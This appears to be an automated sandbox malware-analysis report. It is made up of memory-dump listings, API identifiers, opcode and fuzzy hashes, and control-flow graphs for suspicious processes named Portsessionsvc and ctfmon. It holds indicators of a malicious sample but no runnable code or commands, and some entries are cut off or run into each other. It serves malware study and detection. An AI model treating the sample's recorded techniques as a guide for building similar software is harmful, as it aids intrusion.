                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: FindHandleModuleResource
                                                              • String ID: RTL
                                                              • API String ID: 3537982541-834975271
                                                              • Opcode ID: 3285ac623758a261ad85b94a97ff0f1b43bc755535b8a42849b7f49cabedbb4b
                                                              • Instruction ID: c9fce7d4ae2b87a24d8baefa348f93948b4b7f0a5117a76be55ea5f1040fe51e
                                                              • Opcode Fuzzy Hash: 3285ac623758a261ad85b94a97ff0f1b43bc755535b8a42849b7f49cabedbb4b
                                                              • Instruction Fuzzy Hash: 09C0123124071066E6305B757C0DB47AA585B00F93F05045DB541E92D6D6A9C94486A4
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E467
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: UC$zC
                                                              • API String ID: 1269201914-3669336698
                                                              • Opcode ID: 2fb0078879a7a107ac2c7f880ab3998a6898d5c7f36f5dca03b45e2dd3ef4cf8
                                                              • Instruction ID: 70870b9615b87bba3b5f834e225b1569290e7c1a6eefb8803960190941225445
                                                              • Opcode Fuzzy Hash: 2fb0078879a7a107ac2c7f880ab3998a6898d5c7f36f5dca03b45e2dd3ef4cf8
                                                              • Instruction Fuzzy Hash: 35B0929165A200BC310821121902C3A0208C089F1AB30E42FBA00940C6994C0A06083A
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E467
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: pC$zC
                                                              • API String ID: 1269201914-763265519
                                                              • Opcode ID: d3769a11b1fdb344d1b626bea92f52391f62fa2aff6223f4682e029f3af68be2
                                                              • Instruction ID: e25f675abda3414d33d4b8566b70ca1629501204473c0a48ec21f9d7814b0787
                                                              • Opcode Fuzzy Hash: d3769a11b1fdb344d1b626bea92f52391f62fa2aff6223f4682e029f3af68be2
                                                              • Instruction Fuzzy Hash: 52B0928165A240AC3108A11A1802D3B0108C089B56B30A42FB804C10C2D9484905093B

                                                              Execution Graph

                                                              Execution Coverage:7%
                                                              Dynamic/Decrypted Code Coverage:75%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:8
                                                              Total number of Limit Nodes:1
                                                              execution_graph 7942 7ffd9b780872 7944 7ffd9b78ad20 7942->7944 7943 7ffd9b78aea8 7944->7943 7945 7ffd9b78b205 VirtualProtect 7944->7945 7946 7ffd9b78b23e 7945->7946 7947 7ffd9bb20e11 7948 7ffd9bb20e2f QueryFullProcessImageNameA 7947->7948 7950 7ffd9bb20fd4 7948->7950

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 0 7ffd9b780872-7ffd9b78ad4d 2 7ffd9b78adbe-7ffd9b78adc5 0->2 3 7ffd9b78ad4f-7ffd9b78ad9c 0->3 4 7ffd9b78adc7-7ffd9b78adca 2->4 5 7ffd9b78ae0f-7ffd9b78ae72 2->5 3->5 15 7ffd9b78ad9e-7ffd9b78adb7 3->15 6 7ffd9b78adcc-7ffd9b78addf 4->6 7 7ffd9b78ae04-7ffd9b78ae0c 4->7 16 7ffd9b78ae7a-7ffd9b78aea6 call 7ffd9b78aeca 5->16 17 7ffd9b78ae74 5->17 9 7ffd9b78ade1 6->9 10 7ffd9b78ade3-7ffd9b78adf6 6->10 7->5 9->10 10->10 12 7ffd9b78adf8-7ffd9b78ae00 10->12 12->7 15->2 21 7ffd9b78af17-7ffd9b78af27 16->21 22 7ffd9b78aea8-7ffd9b78aeae 16->22 17->16 25 7ffd9b78af29-7ffd9b78af31 21->25 26 7ffd9b78af32-7ffd9b78af43 21->26 23 7ffd9b78aeb5-7ffd9b78aec9 22->23 24 7ffd9b78aeb0 22->24 24->23 25->26 27 7ffd9b78af45-7ffd9b78af4d 26->27 28 7ffd9b78af4e-7ffd9b78af8d 26->28 27->28 29 7ffd9b78affe-7ffd9b78b001 28->29 30 7ffd9b78af8f-7ffd9b78afe2 28->30 31 7ffd9b78aff3 29->31 32 7ffd9b78b003-7ffd9b78b00d 29->32 37 7ffd9b78b03d-7ffd9b78b0a4 30->37 43 7ffd9b78afe4-7ffd9b78afed 30->43 36 7ffd9b78aff5-7ffd9b78aff8 31->36 31->37 33 7ffd9b78b00f 32->33 34 7ffd9b78b011-7ffd9b78b024 32->34 33->34 34->34 40 7ffd9b78b026-7ffd9b78b02e 34->40 38 7ffd9b78affa-7ffd9b78affd 36->38 39 7ffd9b78b032-7ffd9b78b03a 36->39 45 7ffd9b78b0a6 37->45 46 7ffd9b78b0ac-7ffd9b78b0d8 call 7ffd9b78b0fc 37->46 38->29 39->37 40->39 43->31 45->46 49 7ffd9b78b149-7ffd9b78b157 46->49 50 7ffd9b78b0da-7ffd9b78b0e0 46->50 53 7ffd9b78b159-7ffd9b78b161 49->53 54 7ffd9b78b162-7ffd9b78b173 49->54 51 7ffd9b78b0e7-7ffd9b78b0fb 50->51 52 7ffd9b78b0e2 50->52 52->51 53->54 55 7ffd9b78b175-7ffd9b78b17d 54->55 56 7ffd9b78b17e-7ffd9b78b23c VirtualProtect 54->56 55->56 60 7ffd9b78b23e 56->60 61 7ffd9b78b244-7ffd9b78b26c 56->61 60->61
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2028498226.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_7ffd9b780000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0d07c0bdb9b86a2e09a06747b448381fce5b18d4bf33b79ae32c32cb526c3d9b
                                                              • Instruction ID: bab8347454a9102e7ef615ab5528e8995f728c533dbae8f6131bbe9935801b3b
                                                              • Opcode Fuzzy Hash: 0d07c0bdb9b86a2e09a06747b448381fce5b18d4bf33b79ae32c32cb526c3d9b
                                                              • Instruction Fuzzy Hash: F402F630A0CB8D4FEB59DF68C8567E93BE1FF55311F04426EE45DC32A2DA74A8458B81

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2031997906.00007FFD9BB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_7ffd9bb20000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID: FullImageNameProcessQuery
                                                              • String ID:
                                                              • API String ID: 3578328331-0
                                                              • Opcode ID: 22841c04666b6e02d6f06b0786a48063753df4dd752d6af5c7e1d36e41b2d006
                                                              • Instruction ID: 7eeeee1704b9183de976cb871730a76e614c4b7ea6502f71ebfbdce520b253f9
                                                              • Opcode Fuzzy Hash: 22841c04666b6e02d6f06b0786a48063753df4dd752d6af5c7e1d36e41b2d006
                                                              • Instruction Fuzzy Hash: D181B430609A8D4FEB69DF28C8557F937E1FB68315F00427EE85EC7292CA749941CB81
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2031997906.00007FFD9BB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_7ffd9bb20000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 56f9bfbf56c35ff0ef195556f87159e0f14e9dd12a84146398dad28f4fe559d7
                                                              • Instruction ID: d43a7d0caaa04368c9ad5198706efb20577927d490bdb3df4d9615be7edde2b8
                                                              • Opcode Fuzzy Hash: 56f9bfbf56c35ff0ef195556f87159e0f14e9dd12a84146398dad28f4fe559d7
                                                              • Instruction Fuzzy Hash: 9431D6A240E7C18FD7138BB48C759913FB1AF57254B0E49DBC0C18F0B3E1686A29E726
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000021.00000002.2341554734.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_33_2_7ffd9b750000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 5\_H
                                                              • API String ID: 0-3325266018
                                                              • Opcode ID: 43ba43eef2bf21766aaf281af9e95dda714425204245929c7e9abe4e98e57a33
                                                              • Instruction ID: 0990e359256e7cd940bf53d70873a10cefc396b98680fcd53c861efbfaf50500
                                                              • Opcode Fuzzy Hash: 43ba43eef2bf21766aaf281af9e95dda714425204245929c7e9abe4e98e57a33
                                                              • Instruction Fuzzy Hash: A191F475A19A8D8FE799DFA88875BA97FE0FB56300F1001BAD04AD72E6DAB81411C740
                                                              Memory Dump Source
                                                              • Source File: 00000021.00000002.2341554734.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_33_2_7ffd9b750000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fc838d57fb5c7cab4301004544daddf84993360c0c29d0c17331680ac707467d
                                                              • Instruction ID: 8218cdea8fc396d879ea78fc279d73bef707543a4b53b50bc4305096d39b19e1
                                                              • Opcode Fuzzy Hash: fc838d57fb5c7cab4301004544daddf84993360c0c29d0c17331680ac707467d
                                                              • Instruction Fuzzy Hash: E741F63270D9184FE728EA9CF9999F973D1EF4532070501BBE08AC7167DD11AC8287C1
                                                              Memory Dump Source
                                                              • Source File: 00000021.00000002.2341554734.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_33_2_7ffd9b750000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c138659e6f2ad12bd5dd6ad14f7b6fa46a1b0182fc4c167755b0c57ad48ef3da
                                                              • Instruction ID: eb410da56cebcbc2dd0075a0192dad8482a6550e9c86b16416eba6949d87aa49
                                                              • Opcode Fuzzy Hash: c138659e6f2ad12bd5dd6ad14f7b6fa46a1b0182fc4c167755b0c57ad48ef3da
                                                              • Instruction Fuzzy Hash: D9312E21B5CA5D0FE75CB7AC64A6AF873C2DF98361B1401BAE40EC32F7CD189C424284
                                                              Memory Dump Source
                                                              • Source File: 00000021.00000002.2341554734.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_33_2_7ffd9b750000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3bfda3a39d4baa48c79a14f40c418c6ac1faae4a19bfffa1dc7d55e5525ec2ed
                                                              • Instruction ID: 58121a72129a670ef345771fbbd338aca89fccc5b812b650a64927793e88cfe7
                                                              • Opcode Fuzzy Hash: 3bfda3a39d4baa48c79a14f40c418c6ac1faae4a19bfffa1dc7d55e5525ec2ed
                                                              • Instruction Fuzzy Hash: 4531A431A0D64E8FDB45EBA4C8649A97BF0FF56311F0506BAD009D71A2DB79A542CB40
                                                              Memory Dump Source
                                                              • Source File: 00000021.00000002.2341554734.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_33_2_7ffd9b750000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 253098be561ab741130dc3b0c61eec200984cbfa866f4249a6222dea49361338
                                                              • Instruction ID: c7e940f9b0a50386ac2fe85ec7f1272d0d3dee41f3775d6b2b1ba1f82182270c
                                                              • Opcode Fuzzy Hash: 253098be561ab741130dc3b0c61eec200984cbfa866f4249a6222dea49361338
                                                              • Instruction Fuzzy Hash: 27212920B1DA5D0FE798F7AC94AA67576C2EB8C311B5501B9E40EC32F6DD549C428281
                                                              Memory Dump Source
                                                              • Source File: 00000021.00000002.2341554734.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_33_2_7ffd9b750000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 32a353e193462b28e0321114d46081615293b037a552e91aa681a0282c1e65d4
                                                              • Instruction ID: 3aba8ffb3bbdff62fe9a3eaa6643644d39a3268a97b6ed6171d2f4e355738bd1
                                                              • Opcode Fuzzy Hash: 32a353e193462b28e0321114d46081615293b037a552e91aa681a0282c1e65d4
                                                              • Instruction Fuzzy Hash: 04213636A0E78D8FE722DAA8C8210DD7FA0EF53220F0602B7D044CB1E2D534264AC751
                                                              Memory Dump Source
                                                              • Source File: 00000021.00000002.2341554734.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_33_2_7ffd9b750000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: add9277b5888077271a53e2258b35bd97d08d86870da8c95f1be01113a6815ac
                                                              • Instruction ID: 5de72f19e994b8219f63b9b0338491c9205ca08a011b76727c854e365954bf3a
                                                              • Opcode Fuzzy Hash: add9277b5888077271a53e2258b35bd97d08d86870da8c95f1be01113a6815ac
                                                              • Instruction Fuzzy Hash: A6211F71E19A1D8FDBA5DB88C4A06E973E1FB68340F1106BAD40DD32B1DA75AE41DB80
                                                              Memory Dump Source
                                                              • Source File: 00000021.00000002.2341554734.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_33_2_7ffd9b750000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b73e006f0d874c8b3562a7fe9cdba1bdaa7aa95736f343ef497f20f694398332
                                                              • Instruction ID: ed17d54a70abd847034709a4c82518376d33f0afb5f50a6fa555820bbbe6db2c
                                                              • Opcode Fuzzy Hash: b73e006f0d874c8b3562a7fe9cdba1bdaa7aa95736f343ef497f20f694398332
                                                              • Snapshot File: hcaresult_34_2_7ffd9b7b1000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: I
                                                              • API String ID: 0-3707901625
                                                              • Opcode ID: 4119c5da3a654fef30a86e11c17fa1e5eee9ce641b23e5be0e6f8b4f66b92db0
                                                              • Instruction ID: be9d14774810aa6bccb53f8b8f2aef84cbd445e0a43f8931e159da244751b328
                                                              • Opcode Fuzzy Hash: 4119c5da3a654fef30a86e11c17fa1e5eee9ce641b23e5be0e6f8b4f66b92db0
                                                              • Instruction Fuzzy Hash: ECE01A6054A3C04FCB0AEB7484698447F70AE6B21078B41DEC049CB1B3D62D8949C701
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b7b1000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b6e9b062b809bcd373f3164e7254d76edad56c9533ff08d4d19a55d7b3067924
                                                              • Instruction ID: 18968e0c1a8c31391b8ce87d1fdc6234cfca07fc4b771535610fc600cb2d23bb
                                                              • Opcode Fuzzy Hash: b6e9b062b809bcd373f3164e7254d76edad56c9533ff08d4d19a55d7b3067924
                                                              • Instruction Fuzzy Hash: D0026A31A0D79D4FE7259B6888656A53BE1EF42310F0502FED44D8B1F3DA28AD46CF91
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b7b1000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3f4f7cdb9986be2c6c8d2d2b1f88a3c2bd85aef85648821ee94ac230009f639e
                                                              • Instruction ID: 31261c5eca36d5b311b493f8da86bb73fa778f3766ab094750b71d4c1d320c2b
                                                              • Opcode Fuzzy Hash: 3f4f7cdb9986be2c6c8d2d2b1f88a3c2bd85aef85648821ee94ac230009f639e
                                                              • Instruction Fuzzy Hash: 54910821B1DA5D0FEB9CEA68447667973C2EF94300F45427AD40EC72E7DD28BD858B90
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b7b1000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fc89b2a18b32a3f1aa389b336244489d40b9b1c9ffab82583b84a38affaaee8e
                                                              • Instruction ID: a99b7475bdf1b0d78bae78759ea9cce6dc6660825576532314419b7ce79f230c
                                                              • Opcode Fuzzy Hash: fc89b2a18b32a3f1aa389b336244489d40b9b1c9ffab82583b84a38affaaee8e
                                                              • Instruction Fuzzy Hash: 2D510B31B0D75D4FDB68EB58D864AA977D2FB94310F0502BAD00DD72E2CE246D418F81
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b780000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cf94055f25c89cbf22be56ef6fb2a07fff3509c97e40e5239a55bba00ad853bf
                                                              • Instruction ID: e5cb615937688ad0b9fcfbfe5a384d5356d8417bfd627d28e2c45eeb832c2d6f
                                                              • Opcode Fuzzy Hash: cf94055f25c89cbf22be56ef6fb2a07fff3509c97e40e5239a55bba00ad853bf
                                                              • Instruction Fuzzy Hash: E341033270D9184FE728EAACF89A9F973D0EF4532170501BBE48AC7167DE11AC8287C5
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b780000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6c35decbc08cbc3cee93faa705afa38b7edc40213f59cf188a8239d96f805045
                                                              • Instruction ID: 90932cdc5a13501dab715adc5cce707e3616f360477ef0b61d20fdd1694b7f4c
                                                              • Opcode Fuzzy Hash: 6c35decbc08cbc3cee93faa705afa38b7edc40213f59cf188a8239d96f805045
                                                              • Instruction Fuzzy Hash: CF310C22B5DA1D0FE758F66C64AAAF877C2DF98321B5401BAF41EC32F7CD289C414284
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b780000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b7ff255d894394a58978ec39aaf285e6989d829c2f4a03ee469595d5ac7e01ec
                                                              • Instruction ID: 6524cb12264f7aa2b0f6e7b601e95707224923ae9ac279fbecec55937f1d368a
                                                              • Opcode Fuzzy Hash: b7ff255d894394a58978ec39aaf285e6989d829c2f4a03ee469595d5ac7e01ec
                                                              • Instruction Fuzzy Hash: AB31B631E09A4E8FDB45EB68C8A49AD7BF1FF5A311F0546BAC009D71B2DB38A541CB40
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b780000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 49a80a9fdcd03099a241d80db679b71a00ddb82837dac37ade5eb12419e4448a
                                                              • Instruction ID: cf8ed2ec60b839351744efc3890032cdc56ef7e5107e4cea8f1e7a694e2c146b
                                                              • Opcode Fuzzy Hash: 49a80a9fdcd03099a241d80db679b71a00ddb82837dac37ade5eb12419e4448a
                                                              • Instruction Fuzzy Hash: 2921F920B19E1D0FE798F76C54AE67976C3EB9C312B5101B9E40EC32F6DD289C418281
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b7b1000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0da6d733ff7097c16e130d48e07452425e900f5a3ac85459d8685ce0260feaa3
                                                              • Instruction ID: 905fe853454272e25f0d5d5a0c418f9fdb33f45c25f3cc13fe0950c524b69a0f
                                                              • Opcode Fuzzy Hash: 0da6d733ff7097c16e130d48e07452425e900f5a3ac85459d8685ce0260feaa3
                                                              • Instruction Fuzzy Hash: 2B112E2BF4C2610EE319B7BDB4764FD3790DF5113970842B7E19DC91E3ED19644A8A84
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b780000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5a6607c0b624f76c502a7627b08efecc7c56037b1f7d040590a8890f31261492
                                                              • Instruction ID: 8037fad38bb2515d9e3fea65893ade6e566569afcdd801472dcf39d1b7b20d20
                                                              • Opcode Fuzzy Hash: 5a6607c0b624f76c502a7627b08efecc7c56037b1f7d040590a8890f31261492
                                                              • Instruction Fuzzy Hash: FF211F31E19E1D9FDBA5DB48C4A07E973E1FB58311F1102BAD40DD32B1DA75AA408B80
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b790000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4b6c086a12b44d223cdf99953ddca188e9f0ea4cc2b1d7489cd5b64896abb684
                                                              • Instruction ID: 945b75517a02cd6e8f3255f3caba480c4998c57caa30c26182d8df0c5af9657a
                                                              • Opcode Fuzzy Hash: 4b6c086a12b44d223cdf99953ddca188e9f0ea4cc2b1d7489cd5b64896abb684
                                                              • Instruction Fuzzy Hash: 2D119D71F0861E8BEB24DF88D8686BD77B2FF44314F51033AD41A9B2A5DF782A018780
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b7b1000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 83219f9eb08833539ba2eeaad102a2e585418424b1152b8329b94597c77bebfa
                                                              • Instruction ID: 8ad9c47c7347c1bd45a87bb84af5f303b273e3f3db6f5b9025bfd76ffed5c607
                                                              • Opcode Fuzzy Hash: 83219f9eb08833539ba2eeaad102a2e585418424b1152b8329b94597c77bebfa
                                                              • Instruction Fuzzy Hash: 12019E31F0562E4BFB68D69894697F973E1EF84344F050279D40ED61E1DA28AE808F80
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b7b1000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e4233d5116f3023a5cbcaad72285692031cc97edc8e70479d8cc548bf707d2ee
                                                              • Instruction ID: e4495bcb147973e78e46cbbd9060326d452dacd71d52afcb28b8c491dd5dfb51
                                                              • Opcode Fuzzy Hash: e4233d5116f3023a5cbcaad72285692031cc97edc8e70479d8cc548bf707d2ee
                                                              • Instruction Fuzzy Hash: F7F06D31B09A1E4EEB94EA9C54AA7FC77D1EF98212F440176E41DC32A3CE2869854B91
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b780000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 775f389685e86093e890a0d42bf344c6183ae16eae305fb97188253a588cc764
                                                              • Instruction ID: da51c9fa52b7cef639a1733a7d3759ea6381a400f3ef9667fa2d7d180bcb1368
                                                              • Opcode Fuzzy Hash: 775f389685e86093e890a0d42bf344c6183ae16eae305fb97188253a588cc764
                                                              • Instruction Fuzzy Hash: BE011E60E19F1D4EE7B5A65888B47B971D1AF48702F4202B9E45EE32B2DF786E404600
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.2322117292.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_34_2_7ffd9b7b1000_ctfmon.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
